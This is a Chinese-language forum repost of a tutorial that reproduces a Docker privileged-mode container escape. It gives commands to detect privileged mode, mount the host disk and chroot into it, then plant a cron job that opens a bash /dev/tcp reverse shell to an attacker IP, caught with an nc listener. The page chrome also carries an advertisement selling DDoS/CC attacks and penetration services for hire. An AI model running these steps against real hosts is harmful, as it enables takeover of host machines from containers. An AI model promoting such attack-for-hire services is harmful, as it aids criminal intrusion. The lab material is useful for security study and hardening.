登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
科技
›
[docker逃逸] Privileged 特权模式逃逸复现
[docker逃逸] Privileged 特权模式逃逸复现
[ 复制链接 ]
颜清华
2025-6-9 16:00:49
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述
在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问所有设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境配置
以特权模式创建容器
docker pull centos
docker run -itd --privileged centos /bin/bash
复制代码
查看当前是否为docker环境:
cat /proc/1/cgroup|grep docker
复制代码
systemd-detect-virt 也可以判断当前是否为容器
systemd-detect-virt
复制代码
查看当前是否为特权模式
capsh --print
复制代码
cat /proc/self/status | grep CapEff
复制代码
CapEff为0000001fffffffff,当前容器为特权模式。
复现
使用lsblk查看磁盘
挂载宿主机根目录
mkdir test
mount /dev/sds3 test
复制代码
挂载成功
使用chroot切换根目录,方便进行计划任务反弹shell
chroot test
复制代码
创建计划任务
crontab -e
复制代码
*/1 * * * * /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"
复制代码
攻击机监听反弹shell,成功反弹了宿主机的shell
nc -lvvp 8080
复制代码
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
逃逸
docker
Privileged
特权
模式
相关帖子
网卡混杂模式解析:从网络诊断到 Kubernetes 网络模型
14.结构型 - 外观模式 (Facade Pattern)
15.结构型 - 组合模式 (Composite Pattern)
观察者模式,发布/订阅模式,与回调函数
docker学习笔记
docker学习笔记
16.结构型 - 享元模式 (Flyweight Pattern)
AI 付费模式终极对比:ChatGPT、Gemini、Claude 定价策略拆解,谁最值得买单?
“静态回调+上下文指针”模式实现回调机制
RabbitMQ发布订阅模式同一消费者多个实例如何防止重复消费?
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
网卡混杂模式解析:从网络诊断到 Kubernetes 网络模型
0
460
班嘉淑
2025-12-09
安全
14.结构型 - 外观模式 (Facade Pattern)
1
247
官厌
2025-12-12
安全
15.结构型 - 组合模式 (Composite Pattern)
0
435
即息极
2025-12-12
安全
观察者模式,发布/订阅模式,与回调函数
0
49
粉押淫
2025-12-13
安全
docker学习笔记
0
705
咒卖箴
2025-12-14
安全
docker学习笔记
1
788
汪玉珂
2025-12-14
安全
16.结构型 - 享元模式 (Flyweight Pattern)
0
700
莠畅缕
2025-12-15
安全
AI 付费模式终极对比:ChatGPT、Gemini、Claude 定价策略拆解,谁最值得买单?
0
652
匝抽
2025-12-16
安全
“静态回调+上下文指针”模式实现回调机制
0
597
嫂潍
2025-12-17
业界
RabbitMQ发布订阅模式同一消费者多个实例如何防止重复消费?
0
734
滕佩杉
2025-12-18
回复
(2)
豌笆
2025-10-17 08:33:53
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
谢谢楼主提供!
扎先
2025-10-17 13:23:40
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
过来提前占个楼
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
代码
签约作者
程序园优秀签约作者
发帖
颜清华
2025-10-17 13:23:40
关注
0
粉丝关注
23
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991124
anyue1937
9994893
kk14977
6845358
4
xiangqian
638210
5
韶又彤
9997
6
宋子
9982
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9951
查看更多
今日好文热榜
548
Python环境管理利器Conda:从入门到避坑实
66
MAF快速入门(7)工作流的状态共享
796
Python包管理告别龟速下载:uv工具国内镜像
750
深入理解Linux IPIP隧道:原理、配置与实战
194
HoughLinesP 霍夫变换 C++ opencv 内存报
734
RabbitMQ发布订阅模式同一消费者多个实例如
801
AICube数据集不合法清洗解决方法
603
Iceberg 在hadoop大数据数据湖领域这么火
980
背包DP
438
echarts中appendData的详细讲解
607
C++ 原子操作解析
802
Python - UV 为每个项目创建独立、干净的Py
336
Flink源码阅读:如何生成StreamGraph
704
别再迷信“准确率”了!一文读懂 AI 图像分
108
ROS2概念之DDS
130
具身智能:零基础入门睿尔曼机械臂(四)—
397
Streamlit + LangChain 1.0 简单实现智能问
485
Oracle性能诊断与SQL优化:从9i到19c的技术
923
具身智能:零基础入门睿尔曼机械臂(五)—
224
NGD-SLAM(二)